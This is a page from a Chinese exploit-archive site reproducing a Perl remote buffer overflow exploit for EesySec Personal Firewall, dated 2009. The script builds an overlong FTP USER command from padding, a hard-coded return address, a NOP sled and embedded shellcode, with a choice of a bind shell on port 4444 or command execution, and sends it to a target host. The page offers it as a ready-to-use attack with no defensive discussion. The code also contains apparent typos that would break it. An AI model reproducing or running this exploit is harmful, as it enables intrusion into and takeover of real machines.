首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
EesySec Personal Firewall Remote Buffer Overflow Exploit
来源:he_3dit0r[at]Yahoo[dot]coM 作者:the_Edit0r 发布时间:2009-08-28  
#!/usr/bin/perl
#[+] Bug : EesySec Personal Firewall Remote Buffer Overflow Exploit
#[+] program  Download : http://www.effectmatrix.com/easysec/
#[+] Author : the_Edit0r
#[+] Contact me : the_3dit0r[at]Yahoo[dot]coM
#[+] Greetz to all my friends
#[+] Tested on: Windows XP Pro SP3
#[+] web site: Expl0iters.ir  * Anti-security.ir
#[+] Big thnx: H4ckcity Member
use IO::Socket;
if(@ARGV < 2){
print q(
         [ Expl0iters.ir   anti-security.ir                         ]
         [ EesySec Personal Firewall Remote Buffer Overflow Exploit ]
         [ Code By Edit0r <the_Edit0r@yahoo.com>                    ]
         [ Usage : Expl0it.pl <Host> <win> <shellcode>              ]
         [  win :Target <1> : Windows Xp SP3                        ]
         [  Target <2> : Windows XP SP2 English                     ]
         [  Shellcode : <1> Bind Port 4444 || <2> Execute CMD       ]
         [  Ex : Expl0it.pl 127.0.0.1 1 2                           ]
);exit;}
($host,$win,$shell)=("$ARGV[0]","$ARGV[1]","$ARGV[2]");
$jk = "A"x 68;
if ( $win == 1 ){
$ret ="\x7b\x46\x86\x7c"; # kernel32.dll
}elsif( $win == 2 ){
$ret = "\xed\x83\xe3\x77"; #kernel32.dll
}
$nop ="\x90"x 50;
if ( $shell == 1 ){
# win32_bind -  EXITFUNC=seh LPORT=4444 Size=344 Encoder=PexFnstenvSub http://metasploit.com
$shellcode ="\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\x4f\x85".
"\x2f\x98\x83\xeb\xfc\xe2\xf4\xb3\x6d\x79\x98\x4f\x85\x7c\xcd\x19".
"\xd2\xa4\xf4\x6b\x9d\xa4\xdd\x73\x0e\x7b\x9d\x37\x84\xc5\x13\x05".
"\x9d\xa4\xc2\x6f\x84\xc4\x7b\x7d\xcc\xa4\xac\xc4\x84\xc1\xa9\xb0".
"\x79\x1e\x58\xe3\xbd\xcf\xec\x48\x44\xe0\x95\x4e\x42\xc4\x6a\x74".
"\xf9\x0b\x8c\x3a\x64\xa4\xc2\x6b\x84\xc4\xfe\xc4\x89\x64\x13\x15".
"\x99\x2e\x73\xc4\x81\xa4\x99\xa7\x6e\x2d\xa9\x8f\xda\x71\xc5\x14".
"\x47\x27\x98\x11\xef\x1f\xc1\x2b\x0e\x36\x13\x14\x89\xa4\xc3\x53".
"\x0e\x34\x13\x14\x8d\x7c\xf0\xc1\xcb\x21\x74\xb0\x53\xa6\x5f\xce".
"\x69\x2f\x99\x4f\x85\x78\xce\x1c\x0c\xca\x70\x68\x85\x2f\x98\xdf".
"\x84\x2f\x98\xf9\x9c\x37\x7f\xeb\x9c\x5f\x71\xaa\xcc\xa9\xd1\xeb".
"\x9f\x5f\x5f\xeb\x28\x01\x71\x96\x8c\xda\x35\x84\x68\xd3\xa3\x18".
"\xd6\x1d\xc7\x7c\xb7\x2f\xc3\xc2\xce\x0f\xc9\xb0\x52\xa6\x47\xc6".
"\x46\xa2\xed\x5b\xef\x28\xc1\x1e\xd6\xd0\xac\xc0\x7a\x7a\x9c\x16".
"\x0c\x2b\x16\xad\x77\x04\xbf\x1b\x7a\x18\x67\x1a\xb5\x1e\x58\x1f".
"\xd5\x7f\xc8\x0f\xd5\x6f\xc8\xb0\xd0\x03\x11\x88\xb4\xf4\xcb\x1c".
"\xed\x2d\x98\x5e\xd9\xa6\x78\x25\x95\x7f\xcf\xb0\xd0\x0b\xcb\x18".
"\x7a\x7a\xb0\x1c\xd1\x78\x67\x1a\xa5\xa6\x5f\x27\xc6\x62\xdc\x4f".
"\x0c\xcc\x1f\xb5\xb4\xef\x15\x33\xa1\x83\xf2\x5a\xdc\xdc\x33\xc8".
"\x7f\xac\x74\x1b\x43\x6b\xbc\x5f\xc1\x49\x5f\x0b\xa1\x13\x99\x4e".
"\x0c\x53\xbc\x07\x0c\x53\xbc\x03\x0c\x53\xbc\x1f\x08\x6b\xbc\x5f".
"\xd1\x7f\xc9\x1e\xd4\x6e\xc9\x06\xd4\x7e\xcb\x1e\x7a\x5a\x98\x27".
"\xf7\xd1\x2b\x59\x7a\x7a\x9c\xb0\x55\xa6\x7e\xb0\xf0\x2f\xf0\xe2".
"\x5c\x2a\x56\xb0\xd0\x2b\x11\x8c\xef\xd0\x67\x79\x7a\xfc\x67\x3a".
"\x85\x47\x68\xc5\x81\x70\x67\x1a\x81\x1e\x43\x1c\x7a\xff\x98";
}else( $shell == 2 ){
# Execute CMD
$shellcode ="\x55\x8B\xEC\x33\xFF\x57\xC6\x45\xFC\x63\xC6\x45\xFD\x6D\xC6\x45\xFE\x64\x57\xC6\x45\xF8\x01\x8D\x45\xFC\x50\xB8\x6D\x13\x86\x7C\xFF\xD0\xCC";
}
$expl = $jk.$ret.$nop.$shellcode;
$exploit = IO::Socket::INET->new(Poroto =>"tcp",PeerAddr => "$host",PeerPort => "21");
print $exploit "USER $expl\n";
print "[ * ]Payload Created...\n";
print "[ * ]Injecting Payload...\n";
print "[ * ] Shell...\n";
close($exploit);
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·WM Downloader (.Smi/ .Ram/ .pl
·Linux Kernel <= 2.6.30 atalk_g
·Mozilla Firefox 3.0.5 location
·linux/x86 Polymorphic shellcod
·HyperVM File Permissions Local
·TFTPUtil GUI 1.3.0 Remote Deni
·ProShow Producer / Gold 4.0.25
·Discuz! Plugin Crazy Star <= 2
·Lotus note connector for Black
·Open Auto Classifieds <= 1.5.9
·Novell Client for Windows 2000
·Open Auto Classifieds versions
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved